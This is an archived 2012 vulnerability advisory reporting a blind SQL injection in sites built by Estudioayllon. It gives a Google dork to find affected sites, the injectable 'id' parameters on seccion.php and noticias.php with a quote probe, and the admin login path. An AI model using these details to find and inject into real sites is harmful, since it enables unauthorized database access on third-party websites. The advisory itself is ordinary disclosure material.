Estudioayllon Blind SQL Injection

2012.05.03
Credit: Kalashinkov3
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

[+] Info================================================================ [-] Title : Estudioayllon Blind SQL-I Vulnerability [-] Author: Kalashinkov3 [-] Home : ALGERIA / 13000 [-] Website : 1337day.com [-] Vendor: estudioayllon.com [-] Email : kalashinkov3[at]Hotmail[dot]Fr [-] Date : 01/05/2012 [-] Google Dork : intext:"Dise&#195;&#177;o: Estudioayll&#195;&#179;n" [-] Security Risk : Medium [-] Category : webapps / 0day [-] Special Thanks : -> KedAns-Dz, Caddy-Dz, KnocKout <- [+] Exploit=============================================================== [-] Blind SQL-i :) # http://[localhost]/seccion.php?id='1 # http://[localhost]/seccion.php?id=[SQLi] # http://[localhost]/noticias.php?id='1 # http://[localhost]/noticias.php?id=[SQLi] [-] Admin Login # http://[localhost]/admin ^_^ G00d LUCK ALL :=) [+] Greets===================================================================+ + BrOx-dz, KedAns-Dz, Caddy-Dz, KnocKout, Rizky Ariestiyansyah, + Keinji1258, 1337day.com, packetstormsecurity.org, Exploit-id.com, Over-x + andhrahackers.com, 1337day.com/team, id-backtrack.com, dofus-exploit.com + all Algerians Hacker'S ;), All My Friends + [ I Love You Lily Far ] + + =============================================================================+


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top